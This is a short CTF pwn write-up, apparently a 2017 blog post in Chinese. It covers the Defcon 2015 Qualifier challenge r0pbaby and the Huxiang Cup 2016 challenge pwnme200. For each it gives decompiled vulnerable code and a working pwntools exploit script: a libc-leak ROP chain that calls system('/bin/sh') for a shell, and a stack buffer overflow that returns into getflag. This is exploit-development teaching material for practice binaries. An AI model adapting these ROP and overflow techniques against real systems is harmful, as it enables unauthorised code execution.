RoutineTraining Pwn 发表于 2017-08-10 | 更新于 2017-08-25 | 分类于 CTF , Writeup Defcon 2015 QualifierR0pbabyVuln Points: __int64 sub_C46(){ signed int v0; // eax@4 unsigned __int64 v1; // r14@15 int v2; // er13@17 size_t v3; // r12@17 int v4; // eax@18 void *handle; // [sp+8h] [bp-448h]@1 char nptr[1088]; // [sp+10h] [bp-440h]@2 __int64 savedregs; // [sp+450h] [bp+0h]@22...... if ( v1 ) { v2 = 0; v3 = 0LL; while ( 1 ) { v4 = _IO_getc(stdin); if ( v4 == -1 ) break; nptr[v3] = v4; ++v2; v3 = v2; if ( v1 <= v2 ) goto LABEL_22; } v3 = v2 + 1; } else { v3 = 0LL; }LABEL_22: memcpy(&savedregs, nptr, v3); } }...} Exp: def getsymbol(symbol): io.recvuntil('4) Exit\n:') io.sendline('2') io.recvuntil('Enter symbol:') io.sendline(symbol) data = io.recvline() data = data[data.find('0x'):-1] data = long(data,16) return datapopreiOffset = 0x000000000001fc3asystemOffset = libc.symbols['system']log.info('system offset:' + str(systemOffset))binshoffset = libc.search('/bin/sh').next()log.info('binsh offset:' + str(binshoffset))systemAddress = getsymbol('system')libcbase = systemAddress - systemOffsetlog.info('libcbase:' + hex(libcbase))binshAddress = libcbase + binshoffsetlog.info('binshAddress:' + hex(binshAddress))popreiAddress = libcbase + popreiOffsetlog.info("poprdiAddress: " + hex(popreiAddress))io.recvuntil('4) Exit\n:')io.sendline('3')io.recvuntil('Enter bytes to send (max 1024):')io.sendline('50')raw_input()payload = 'A' * 8 + p64(popreiAddress) + p64(binshAddress) + p64(systemAddress) + 'ABCDABCD'io.sendline(payload)io.interactive() 湖湘杯 2016Pwnme200Vuln Points: int getfruit(){ char v1; // [sp+14h] [bp-A4h]@1 fflush(stdout); printf("Please input the name of fruit:"); __isoc99_scanf("%s", &v1); return printf("oh,%s...\n", &v1);} Exp: getflagAddress = binary.symbols['getflag']io.recvuntil('>> 6. Exit')io.sendline('5')io.recvuntil('Please input the name of fruit:')payload = 'A' * 168 + p32(getflagAddress) + 'ABCD'io.sendline(payload)print io.recvall()
